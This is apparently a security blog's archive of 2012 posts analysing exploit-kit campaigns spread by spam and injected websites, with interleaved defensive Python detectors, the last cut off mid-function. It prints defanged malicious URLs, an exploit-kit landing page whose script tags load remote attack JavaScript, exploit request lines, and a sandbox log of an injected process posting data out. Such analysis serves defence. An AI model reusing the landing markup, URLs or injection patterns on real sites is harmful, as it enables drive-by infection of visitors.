Tag Archives: exploit

WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed a few Twitter followers of one of our websites, we noticed a user that was following us; see the image:

We analyzed the (infected) website:

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server is located in Switzerland (CH) and no other websites are hosted on the same server. The domain is registered with the suffix COM and the keyword of the domain is wordpress-how-to-videos. The organization is hosttech GmbH.

The website is used to redirect users to a malicious URL that tries to exploit the user’s browser with a Java exploit, as you can see from this image:

Java Exploit

The malicious redirect is triggered only if the user browses the infected website with a Referer header that contains the name of a search engine, such as Google. Using the free HTML Sniffer service we can simulate the Google referer and see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8
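As an added example (not code from the original post, and not the HTML Sniffer service), the following Python script reproduces the check described above: it requests the same URL with no Referer, a Google referer and a Bing referer, without following redirects, and flags the page as referer-cloaked when any probe receives a different status or Location than the direct request. The built-in mock site, the probe referers and the exploit.invalid Location are constructed so the script runs offline; point check_referer_cloaking() at a page you administer to use it for real.

```python
"""Detect referer-conditioned ("cloaked") redirects on a web page.

Added example, not part of the original post. The same URL is requested
with several Referer headers and any response that differs from the direct
request (status code or Location header) is reported. A constructed mock
site is included so the check runs offline.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed probe set; "direct" means no Referer header at all.
PROBE_REFERERS = {
    "direct": None,
    "google": "http://www.google.com/search?q=wordpress+videos",
    "bing": "http://www.bing.com/search?q=wordpress+videos",
}


def fetch_no_redirect(url, referer=None, timeout=5):
    """GET `url` once, without following redirects; return (status, location)."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    headers = {"User-Agent": "referer-probe/1.0"}
    if referer:
        headers["Referer"] = referer
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    resp.read()  # drain the body so the connection can be closed cleanly
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location


def check_referer_cloaking(url, referers=PROBE_REFERERS):
    """Probe `url` with each referer; flag it when any probe differs from the direct request."""
    results = {name: fetch_no_redirect(url, ref) for name, ref in referers.items()}
    baseline = results["direct"]
    suspicious = {name: r for name, r in results.items() if r != baseline}
    return {"results": results, "cloaked": bool(suspicious), "suspicious": suspicious}


# ---- constructed mock of an infected site, for offline demonstration only ----
EXPLOIT_LOCATION = "http://exploit.invalid/pavilion?8"  # placeholder, not a real URL


class _CloakedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Redirect only when the visitor arrived from Google, like the site described in the post.
        if "google." in self.headers.get("Referer", ""):
            self.send_response(302)
            self.send_header("Location", EXPLOIT_LOCATION)
            self.end_headers()
        else:
            body = b"<html><body>welcome</body></html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the demonstration quiet
        pass


def start_mock_site():
    """Start the mock site on a free localhost port in a daemon thread; return its base URL."""
    server = HTTPServer(("127.0.0.1", 0), _CloakedHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/" % server.server_address[1]


if __name__ == "__main__":
    report = check_referer_cloaking(start_mock_site())
    for name, (status, loc) in report["results"].items():
        print("%-7s -> %s %s" % (name, status, loc or ""))
    print("cloaked:", report["cloaked"])
```

The comparison is done on status and Location rather than on body hashes on purpose: the direct response may legitimately vary between requests, while a 302 that appears only for search-engine referers is exactly the signature this post describes.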

Both malicious URLs are hosted at this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on the websites of your Twitter followers!

Amazon.com Order Confirmation leads to Blackhole Exploit Kit

We received a few emails with the subject:

Amazon.com Order Confirmation

Inside the email message there is an HREF link that leads to a malicious web page containing JavaScript code that redirects users to the main URL of the Blackhole exploit kit:

Amazon.com fake order page

The Blackhole exploit kit URL is:

GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnroidsoft .net

Fortunately the domain is no longer active.

New Malicious Injected Code: Injection_head and Injection_tail

We have logged a few websites infected with a new injected JavaScript code that seems to target mainly websites powered by WordPress and Joomla. Below is a screenshot of the malicious script:

Image

As we can see from the image above, the injected code starts with:

<!--Injection_head[SessionID=...]-->

And it ends with:

<!--Injection_tail[SessionID=...]-->

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that appears to be sent by LinkedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body also contains a few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clearly an Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits a vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507); more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Com.Br Websites Infected with Malicious JS Code (count18.php)

Our sandbox has logged various domains with the .COM.BR suffix infected with malicious obfuscated JavaScript code that is injected at the beginning of the websites' HTML pages, before the initial <html> tag:

Obfuscated JS code

The malicious script redirects users to a malicious URL:

hxxp:// bylviha .ru/count18.php

Examples of infected websites:

hxxp:// carboniferacatarinense .com .br/
hxxp:// www. csir-iir. org/
hxxp:// www. terapets .com/

Sometimes the malicious script is injected inside the <title> tag:

JS Injected in Title TAG
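As an added example, not part of the original blog, the following Python scanner covers both injection patterns documented on this page: the Injection_head / Injection_tail comment markers from the WordPress/Joomla post above, and the obfuscated script dropped before the opening <html> tag or inside the <title> tag in this .com.br post. It also lists external script URLs so they can be checked with URLVoid or a blocklist. The sample pages are constructed for the demonstration; scan_tree() is for running it over a site's document root.

```python
"""Scan HTML files for the injection patterns described in these posts.

Added example, not code from the original blog. It flags:
  * Injection_head / Injection_tail comment markers (and their SessionID),
  * <script> blocks placed before the opening <html> tag,
  * <script> blocks injected inside the <title> tag,
and lists external script URLs for checking against a blocklist.
The sample pages at the bottom are constructed, not taken from a real site.
"""
import re
from pathlib import Path

MARKER_RE = re.compile(
    r"<!--Injection_head\[SessionID=(?P<sid>[^\]]*)\]-->(?P<body>.*?)"
    r"<!--Injection_tail\[SessionID=[^\]]*\]-->",
    re.IGNORECASE | re.DOTALL,
)
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
HTML_TAG_RE = re.compile(r"<html\b", re.IGNORECASE)
TITLE_RE = re.compile(r"<title\b[^>]*>(.*?)</title\s*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def scan_html(html):
    """Return a dict of findings for one HTML document."""
    findings = {
        "injection_markers": [m.group("sid") for m in MARKER_RE.finditer(html)],
        "script_before_html": False,
        "script_in_title": False,
        "external_scripts": SRC_RE.findall(html),
    }
    html_tag = HTML_TAG_RE.search(html)
    first_script = SCRIPT_RE.search(html)
    # A script that appears before <html> (or in a file that has no <html> at all)
    if first_script and (html_tag is None or first_script.start() < html_tag.start()):
        findings["script_before_html"] = True
    for title in TITLE_RE.finditer(html):
        if "<script" in title.group(1).lower():
            findings["script_in_title"] = True
    findings["suspicious"] = bool(
        findings["injection_markers"]
        or findings["script_before_html"]
        or findings["script_in_title"]
    )
    return findings


def scan_tree(root):
    """Scan every .html/.htm/.php file below `root`; return {path: findings} for suspicious files."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".html", ".htm", ".php"):
            findings = scan_html(path.read_text(encoding="utf-8", errors="replace"))
            if findings["suspicious"]:
                hits[str(path)] = findings
    return hits


# ---- constructed sample pages ----
CLEAN_PAGE = "<!DOCTYPE html>\n<html><head><title>My blog</title></head><body>hi</body></html>\n"
MARKER_PAGE = (
    "<!DOCTYPE html>\n<html><head><title>Site</title>\n"
    "<!--Injection_head[SessionID=abc123]--><script>document.write('x')</script>"
    "<!--Injection_tail[SessionID=abc123]-->\n</head><body></body></html>\n"
)
PREFIX_PAGE = "<script>eval(unescape('%2F%2Fobfuscated'))</script>\n<html><body>ok</body></html>\n"
TITLE_PAGE = (
    "<html><head><title>News<script src='http://example.invalid/count18.php'>"
    "</script></title></head></html>\n"
)

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("marker", MARKER_PAGE),
                       ("prefix", PREFIX_PAGE), ("title", TITLE_PAGE)]:
        print(name, scan_html(page))
```

The "script before <html>" rule is the one that catches the count18.php injection even when the obfuscated body changes, because it keys on position rather than on content; the marker rule is the opposite, a fixed string that is cheap to grep for across a whole host.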

URLVoid reports of malicious domains:

http://www.urlvoid.com/scan/bylviha .ru
http://www.urlvoid.com/scan/carboniferacatarinense .com .br
http://www.urlvoid.com/scan/csir-iir. org
http://www.urlvoid.com/scan/terapets .com

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received a few emails that looked like they were sent from LinkedIn:

Email

But after checking the email header details it was clearly spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content matches the typical spreading style of the Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Always pay attention when opening emails, whether from known or unknown senders:

1) Always analyze the email headers to see who really sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid opening emails whose subject relates to pharmaceutical products
5) Avoid opening emails whose subject relates to sexual content
6) When emails appear to come from your bank, always call your bank before opening the email
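Point 1 of the list above can be partly automated. The following Python triage script (an added example, not part of the original post) unfolds raw headers, walks the Received: chain back to the first hop, and reports when the announced HELO name does not match the reverse DNS of the connecting host, when the originating host has no reverse DNS at all, and when the From domain never appears in the relay chain. The two header sets are the ones quoted in the posts above; the registrable-domain heuristic (two labels, three under ccSLDs such as .com.br) and the handling of the Exim and Sendmail/Postfix Received: formats are assumptions of this example.

```python
"""Triage e-mail headers: who really handed the message in, and does that
match the sender it claims to be? Added example, not part of the original
post. The two header sets below are copied from the posts on this page;
the origin-hop logic and the registrable-domain heuristic are assumptions.
"""
import re

RECEIVED_RE = re.compile(
    r"from\s+(?P<claimed>\[?[\w.:-]+\]?)"   # name or [ip] announced by the sender
    r"(?:\s+\((?P<paren>[^)]*)\))?",        # optional "(rdns [ip] helo=...)" part
    re.IGNORECASE,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})")
HELO_RE = re.compile(r"helo=([\w.-]+)", re.IGNORECASE)
ADDR_DOMAIN_RE = re.compile(r"@([\w.-]+)")
CC_SLDS = {"com", "co", "net", "org", "gov", "edu", "ac"}  # heuristic, not a public-suffix list


def unfold(raw):
    """Join folded continuation lines; return a list of (lowercased name, value)."""
    lines = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t" and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    fields = []
    for line in lines:
        name, _, value = line.partition(":")
        fields.append((name.strip().lower(), value.strip()))
    return fields


def registrable(host):
    """Heuristic registrable domain: last two labels, or three under ccSLDs like .com.br."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in CC_SLDS:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def parse_received(value):
    """Extract announced name (HELO), reverse DNS and IP from one Received: value."""
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    claimed, paren = m.group("claimed"), m.group("paren") or ""
    tokens = paren.split()
    ip = IP_RE.search(paren) or IP_RE.search(claimed)
    helo_m = HELO_RE.search(paren)
    if helo_m:
        # Exim style: "from <rdns> ([ip]:port helo=<announced name>)"
        helo = helo_m.group(1)
        rdns = None if claimed.startswith("[") else claimed
    else:
        # Sendmail/Postfix style: "from <announced name> (<rdns> [ip])"
        helo = None if claimed.startswith("[") else claimed
        first = tokens[0] if tokens else ""
        rdns = first if first and not first.startswith("[") and first.lower() != "unknown" else None
    return {"claimed": claimed.strip("[]"), "rdns": rdns,
            "ip": ip.group(1) if ip else None, "helo": helo}


def triage(raw):
    """Return the From domain, the originating hop and a list of human-readable warning flags."""
    fields = unfold(raw)
    hops = [h for h in (parse_received(v) for n, v in fields if n == "received") if h]
    origin = hops[-1] if hops else None  # Received: lines are prepended, so the last is the first hop
    from_value = next((v for n, v in fields if n == "from"), "")
    m = ADDR_DOMAIN_RE.search(from_value)
    from_domain = registrable(m.group(1)) if m else None
    flags = []
    if origin:
        if origin["rdns"] is None:
            flags.append("originating host %s has no reverse DNS name" % origin["ip"])
        if origin["helo"] and origin["rdns"] and registrable(origin["helo"]) != registrable(origin["rdns"]):
            flags.append("HELO %s does not match reverse DNS %s" % (origin["helo"], origin["rdns"]))
        seen = {registrable(h["rdns"]) for h in hops if h["rdns"]}
        if from_domain and from_domain not in seen:
            flags.append("From domain %s never appears in the relay chain" % from_domain)
    return {"from_domain": from_domain, "origin": origin, "flags": flags}


# Header lines copied from the two posts on this page (not constructed).
LINKEDIN_SCAM_HEADERS = """\
Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail
"""
EXPRESS_LINKEDIN_HEADERS = """\
Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail
"""

if __name__ == "__main__":
    for raw in (LINKEDIN_SCAM_HEADERS, EXPRESS_LINKEDIN_HEADERS):
        result = triage(raw)
        print(result["from_domain"], result["origin"]["ip"], result["flags"])
```

These are triage signals, not proof: many legitimate senders relay through providers whose reverse DNS has nothing to do with the From domain, so treat a hit as a reason to look at the message's SPF/DKIM results and to scan the links it carries, exactly as the list above recommends.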

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that impersonate messages from the Better Business Bureau (BBB) but are really used to spread malicious links that lead to the Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

Image

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>

Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox, and this is the report:

Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80

Malicious URLs extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code is injected into the system process wuauclt.exe:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole exploit kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf
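To pull the observations above out of the report mechanically, here is an added Python example (not tooling from the original post) that parses the "Event - Process - ..." lines, groups web requests by process image, exports the non-Microsoft URLs as an IoC list, and flags system processes such as wuauclt.exe contacting hosts outside the domains they are expected to talk to, which is the process-injection symptom the post points out. The sample lines are copied from the report above; the set of system processes and the expected-domain suffixes are assumptions of this example, and defanged hosts such as "kosmovodki .ru" are re-joined before comparison.

```python
"""Parse the sandbox report format used in the post and extract the facts an
analyst wants: which process spoke to which host, and whether a Windows
system process reached out to a host it has no business contacting.
Added example, not tooling from the original post. Sample lines are copied
from the report above; the allowlists are assumptions of this example.
"""
import re

# Assumption: on a clean machine these images should only talk to Microsoft infrastructure.
SYSTEM_PROCESSES = {"wuauclt.exe", "explorer.exe", "svchost.exe", "verclsid.exe"}
EXPECTED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "msn.com")


def refang(host):
    """The report writes hosts defanged ("matorbaron .com"); remove the spaces."""
    return re.sub(r"\s+", "", host).lower()


def parse_line(line):
    """Turn one 'Event - Process - field - field ...' line into a record, or None."""
    parts = [p.strip() for p in line.split(" - ")]
    if len(parts) < 3:
        return None
    event, process = parts[0], parts[1]
    rec = {"event": event, "process": process, "image": process.rsplit("\\", 1)[-1].lower()}
    if event == "Web Request" and len(parts) >= 5:
        rec.update(method=parts[2], host=refang(parts[3]), path=parts[4])
    elif event == "Connection Established" and len(parts) >= 5:
        rec.update(proto=parts[2], ip=parts[3], port=int(parts[4]))
    elif event == "Process Created":
        rec.update(child=parts[2].rsplit("\\", 1)[-1].lower())
    return rec


def parse_report(text):
    return [r for r in (parse_line(l) for l in text.splitlines() if l.strip()) if r]


def web_requests_by_process(records):
    """{image name: [(method, host, path), ...]}"""
    by = {}
    for r in records:
        if r["event"] == "Web Request":
            by.setdefault(r["image"], []).append((r["method"], r["host"], r["path"]))
    return by


def suspicious_system_traffic(records):
    """System processes talking to hosts outside the expected Microsoft domains."""
    hits = []
    for r in records:
        if r["event"] == "Web Request" and r["image"] in SYSTEM_PROCESSES:
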